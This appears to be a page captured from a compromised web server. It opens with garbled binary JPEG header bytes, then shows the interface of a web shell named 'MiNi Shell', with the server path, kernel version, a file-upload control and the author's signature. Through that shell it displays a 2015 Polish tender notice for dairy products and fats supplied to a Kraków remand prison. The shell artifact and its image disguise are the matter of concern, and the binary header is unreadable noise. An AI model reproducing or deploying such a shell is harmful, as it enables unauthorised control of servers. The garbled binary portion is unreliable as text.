JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/35464-N-2015.html

<p class="kh_header"><b>Kraków: Dostawy  mleka i jego przetworów oraz tłuszczy roślinnych do Aresztu Śledczego w Krakowie  Podgórzu, ul. Czarnieckiego 3</b><br>
<b>Numer ogłoszenia: 35464 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Krakowie Podgórzu , ul. Stefana Czarnieckiego 3, 30-536 Kraków, woj. małopolskie, tel. 12 620 50 00, faks 12 4235771.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy  mleka i jego przetworów oraz tłuszczy roślinnych do Aresztu Śledczego w Krakowie  Podgórzu, ul. Czarnieckiego 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia w prowadzonym postępowaniu jest:

Grupa I - Mleko i jego przetwory

1	Mleko świeże 2 %		l	2 640	świeże, o zawartości tłuszczu 2%, pakowane
							jednostkowo w opakowania max. o
							pojemności 15 l
2	Kefir				kg	400	o zawartości tłuszczu 2%, opakowanie
							jednostkowe w granicach 300 - 500 g
3	Jogurt naturalny		kg	75	świeży, bez dodatków smakowych,
							opakowanie jednostkowe o gramaturze w
							granicach 100 -	150 g
4	Śmietana 18%			l	1 300	świeża, o zawartości tłuszczu 18%,
							opakowanie jednostkowe o gramaturze w
							granicach 500 - 5000 g
5	Twaróg półtłusty		kg	800	forma lub krajanka
6	Serek homogenizowany		kg	325	naturalny opakowanie jednostkowe 
           naturalny                                                       o gramaturze w granicach 100 - 150 g	        7         Serek homogenizowany		kg	325	truskawkowy  opakowanie jednostkowe
           truskawkowy                                                  o gramaturze w granicach 100 - 150 g 
8         Serek homogenizowany		kg	325	waniliowy  opakowanie jednostkowe
           waniliowy                                                       o gramaturze w granicach 100 - 150 g	
9         Serek homogenizowany		kg	325	brzoskwiniowy  opakowanie jednostkowe
           brzoskwiniowy                                                o gramaturze w granicach 100 - 150 g	
10	Ser topiony			kg	550	naturalny lub z dodatkami smakowymi,
							opakowanie jednostkowe o gramaturze 100 g
                                                                               nie mogą to być produkty seropodobne,
							zawierające tłuszcz roślinny !!!
11	Ser typu FROMAGE		kg	350	naturalny lub z dodatkami smakowymi,
							opakowanie jednostkowe o gramaturze 100 g
12        Jogurt malinowy                      kg        60        świeży, malinowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
13        Jogurt wiśniowy                       kg        60        świeży, wiśniowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
14        Jogurt bananowy                     kg        60        świeży, bananowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
15	Serek śmietankowy		kg	490	naturalny lub z dodatkami smakowymi, 
							opakowanie jednostkowe o gramaturze 100 g
16	Ser żółty			kg	220	nie mogą to być produkty seropodobne,
							zawierające tłuszcz roślinny !!!

Grupa II - Tłuszcze roślinne

Lp.	Nazwa artykułu			Jed. 	Ilość	Uwagi
						miary 
1	Margaryna mleczna			kg	300	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 80-90 %
2	Margaryna do smarowania pieczywa	kg	2 400	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 60-62 %
3	Olej uniwersalny			l	780	olej spożywczy, opakowanie
								jednostkowe o gramaturze w
								granicach 1 - 5l
Jeśli w opisie nie wskazano inaczej, zamawiający dopuszcza opakowania według wyboru wykonawcy  z zastrzeżeniem dostarczania produktów w opakowaniach jednostkowych, szczelnych, spełniających wymagania higieny żywności.

II. Opis dodatkowy:
1. Częstotliwość oraz wielkość poszczególnych dostaw uzgadniana będzie z wykonawcą   w przeddzień dostawy. Zamawiający przewiduje realizację dostaw dwa do pięciu razy  w tygodniu z wyjątkiem sobót i niedziel. Dostawy realizowane będą loco magazyn Aresztu Śledczego w Krakowie Podgórzu,             ul. Czarnieckiego 3, 30-536 Kraków w godz. 8.00 - 12.00. 
2. Dostawy winny być realizowane w opakowaniach oraz transportem wykonawcy na jego koszt. Opakowania oraz środek transportu powinny odpowiadać właściwym przepisom i normom dotyczącym kontaktu z żywnością. Osoba dostarczająca towar do zamawiającego winna posiadać i okazywać na każde żądanie zamawiającego aktualną książeczkę badań do celów sanitarno - epidemiologicznych oraz stosowne atesty producentów w/w artykułów.
3. Dostarczane artykuły winny posiadać jednakową gramaturę oraz jednakowy termin przydatności do spożycia całej dostarczonej partii. 
4. Wykonawca jest zobowiązany do przedstawienia dokumentacji z której będą wynikały parametry dostarczanego produktu - skład chemiczny.
5. Dostarczane produkty mleczne i tłuszcze muszą być zgodne z przepisami rozporządzenia Rady Uni Europejskiej nr 1234/2007 z dnia 22 października 2007r.  ustanawiające wspólną organizację rynków rolnych oraz przepisy szczegółowe dotyczące niektórych produktów rolnych (rozporządzenie                 o jednolitej wspólnej organizacji rynku)
6. Dostarczane artykuły muszą być zgodne ze złożonym zamówieniem.
7. Minimalny termin przydatności do spożycia produktów dostarczanych do magazynu w Areszcie Śledczym w Krakowie Podgórzu winien być odpowiednio:
- mleko, twaróg półtusty, śmietana - minimum 5 dni
- kefir, jogurt naturalny, jogurt: malinowy, wiśniowy, bananowy, serki homogenizowane: naturalny, truskawkowy, waniliowy, brzoskwiniowy,  serek śmietankowy do chleba, serek fromage, ser topiony, ser żółty - minimum 14 dni
- margaryna mleczna, margaryna do smarowania pieczywa, olej uniwersalny - minimum 60 dni.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.55.11.00-0, 15.55.13.10-1, 15.55.10.00-5, 15.51.20.00-0, 15.54.21.00-0, 15.54.50.00-0, 15.54.40.00-3, 15.43.11.00-9, 15.41.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenia. Zamawiajacy uzna, że wykonawca spełnia warunek, jeśli Wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiajacy uzna, że wykonawca spełnia warunek, jeśli Wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiajacy uzna, że wykonawca spełnia warunek, jeśli Wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiajacy uzna, że wykonawca spełnia warunek, jeśli Wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiajacy uzna, że wykonawca spełnia warunek, jeśli Wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2015 godzina 09:30, miejsce: Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.04.2015.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko świeże 2 %		l	2 640	świeże, o zawartości tłuszczu 2%, pakowane
							jednostkowo w opakowania max. o
							pojemności 15 l
2	Kefir				kg	400	o zawartości tłuszczu 2%, opakowanie
							jednostkowe w granicach 300 - 500 g
3	Jogurt naturalny		kg	75	świeży, bez dodatków smakowych,
							opakowanie jednostkowe o gramaturze w
							granicach 100 -	150 g
4	Śmietana 18%			l	1 300	świeża, o zawartości tłuszczu 18%,
							opakowanie jednostkowe o gramaturze w
							granicach 500 - 5000 g
5	Twaróg półtłusty		kg	800	forma lub krajanka
6	Serek homogenizowany		kg	325	naturalny opakowanie jednostkowe 
           naturalny                                                       o gramaturze w granicach 100 - 150 g	        7         Serek homogenizowany		kg	325	truskawkowy  opakowanie jednostkowe
           truskawkowy                                                  o gramaturze w granicach 100 - 150 g 
8         Serek homogenizowany		kg	325	waniliowy  opakowanie jednostkowe
           waniliowy                                                       o gramaturze w granicach 100 - 150 g	
9         Serek homogenizowany		kg	325	brzoskwiniowy  opakowanie jednostkowe
           brzoskwiniowy                                                o gramaturze w granicach 100 - 150 g	
10	Ser topiony			kg	550	naturalny lub z dodatkami smakowymi,
							opakowanie jednostkowe o gramaturze 100 g
                                                                               nie mogą to być produkty seropodobne,
							zawierające tłuszcz roślinny !!!
11	Ser typu FROMAGE		kg	350	naturalny lub z dodatkami smakowymi,
							opakowanie jednostkowe o gramaturze 100 g
12        Jogurt malinowy                      kg        60        świeży, malinowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
13        Jogurt wiśniowy                       kg        60        świeży, wiśniowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
14        Jogurt bananowy                     kg        60        świeży, bananowy opakowanie jednostkowe o   
							gramaturze w granicach 100 -	150 g
15	Serek śmietankowy		kg	490	naturalny lub z dodatkami smakowymi, 
							opakowanie jednostkowe o gramaturze 100 g
16	Ser żółty			kg	220	nie mogą to być produkty seropodobne,
							zawierające tłuszcz roślinny !!!.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 15.55.13.10-1, 15.55.10.00-5, 15.51.20.00-0, 15.54.21.00-0, 15.54.50.00-0, 15.54.40.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Margaryna mleczna			kg	300	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 80-90 %
2	Margaryna do smarowania pieczywa	kg	2 400	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 60-62 %
3	Olej uniwersalny			l	780	olej spożywczy, opakowanie
								jednostkowe o gramaturze w
								granicach 1 - 5l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-9, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com